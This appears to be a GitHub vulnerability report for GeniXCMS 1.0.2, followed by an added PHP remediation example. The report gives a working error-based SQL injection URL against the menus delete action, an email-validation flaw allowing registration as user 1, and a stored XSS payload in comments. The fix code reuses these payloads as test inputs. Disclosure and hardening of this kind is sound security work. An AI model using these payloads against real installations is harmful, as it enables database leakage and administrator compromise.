// menus.control.php line 247 as reported: $_GET['menuid'] is interpolated straight into the SQL string, so a quote in the parameter ends the literal
$sql = sprintf("DELETE FROM `menus` WHERE `menuid` = '%s' ", $_GET['menuid']);
Db::query($sql);
Hecbi changed the title from "SQL Injection in version 1.0.2" to "SQL Injection and a bug in version 1.0.2" on Apr 26, 2017
Hecbi changed the title from "SQL Injection and a bug in version 1.0.2" to "SQL Injection & Mailbox validation logic vulnerabilities & XSS 1.0.2" on Apr 26, 2017
SQL Injection

I found a SQL injection at /inc/lib/Control/Backend/menus.control.php
https://github.com/semplon/GeniXCMS/blob/master/inc/lib/Control/Backend/menus.control.php line 247

Go to http://localhost/gxadmin/index.php?page=menus , find a menu and click the del button. Change the position of menuid and token, and change menuid into:

menuid=hebic'/**/or/**/extractvalue(1,concat(0x7e,database()))/**/or'

exp:

/CMS/GeniXCMS-master/gxadmin/index.php?page=menus&token=eMEfQ9xolysmPbu6Ru1EP13Okkqt0A7FeDO8vjCWo1rpshooHHNy9DsCEqV1qtk3poFGcqkhiR0xxKyv&act=remove&menuid=hebic'/**/or/**/extractvalue(1,concat(0x7e,database()))/**/or'

Don't forget to get an active csrftoken.
Mailbox validation logic vulnerabilities

And there is another vulnerability in register.php line 56
https://github.com/semplon/GeniXCMS/blob/master/register.php

So I can register a new user with the email in id1 by using
register.php?act=edit&id=1

XSS

Register a user and reply to a post with an XSS payload, eg: <script>alert(2)</script>

When the administrator goes to the back end to view this comment and moves the mouse over it, the XSS will take effect.
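Added example, not GeniXCMS code and not part of the report: the `sprintf()` query pattern from menus.control.php rewritten with a bound parameter, beside output encoding for the comment text that reaches the admin back end. It assumes a PDO connection (GeniXCMS's own `Db::query` wrapper is not used) and constructs an in-memory SQLite `menus` table so it runs stand-alone. The injection string and the `<script>` payload quoted in the report are reused only as inputs, to show that the hardened code treats them as inert literals.

```php
<?php
// Added example, not GeniXCMS code. Shows the fix for the two issues reported
// above: bind menuid as a query parameter instead of interpolating $_GET into
// the SQL string, and HTML-encode comment text before rendering it in the
// admin back end. Assumes a PDO connection; an in-memory SQLite table is
// constructed here so the file runs stand-alone (GeniXCMS's Db class is not used).
declare(strict_types=1);

function setupDb(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE menus (menuid TEXT PRIMARY KEY, title TEXT NOT NULL)');
    // Constructed sample rows.
    $pdo->exec("INSERT INTO menus (menuid, title) VALUES ('home', 'Home'), ('about', 'About')");
    return $pdo;
}

// Hardened replacement for the reported line:
//   $sql = sprintf("DELETE FROM `menus` WHERE `menuid` = '%s' ", $_GET['menuid']);
// The value is sent as a bound parameter, so quotes and comment sequences in
// $menuid are compared as data and cannot change the structure of the query.
function deleteMenu(PDO $pdo, string $menuid): int {
    $stmt = $pdo->prepare('DELETE FROM menus WHERE menuid = :menuid');
    $stmt->execute([':menuid' => $menuid]);
    return $stmt->rowCount();
}

// Output encoding for user-supplied comment text. ENT_QUOTES escapes both
// quote styles, so the result is also safe inside attribute values, not only
// in element bodies.
function escapeForHtml(string $text): string {
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function countMenus(PDO $pdo): int {
    return (int) $pdo->query('SELECT COUNT(*) FROM menus')->fetchColumn();
}

$pdo = setupDb();

// The injection string from the report, passed through the hardened function:
// no row has that literal menuid, so nothing is deleted and both rows remain.
$injected = "hebic'/**/or/**/extractvalue(1,concat(0x7e,database()))/**/or'";
if (deleteMenu($pdo, $injected) !== 0 || countMenus($pdo) !== 2) {
    throw new RuntimeException('bound parameter was not treated as a literal');
}

// A legitimate id still deletes exactly one row.
if (deleteMenu($pdo, 'about') !== 1 || countMenus($pdo) !== 1) {
    throw new RuntimeException('exact-match delete failed');
}

// The XSS payload from the report becomes inert text once encoded.
$encoded = escapeForHtml('<script>alert(2)</script>');
if (strpos($encoded, '<') !== false) {
    throw new RuntimeException('output encoding failed');
}

echo 'menus remaining: ' . countMenus($pdo) . PHP_EOL;
echo 'encoded comment: ' . $encoded . PHP_EOL;
```

Run it with `php example.php`; it exits non-zero if either check fails. The same change applies wherever the project builds the DELETE string at line 247, provided its `Db` layer exposes parameter binding; if it only accepts a finished SQL string, a strict allow-list check on `menuid` (for instance a numeric or slug pattern) before the value is interpolated is the fallback, and the comment text should be encoded at the point where the admin view renders it, not where it is stored.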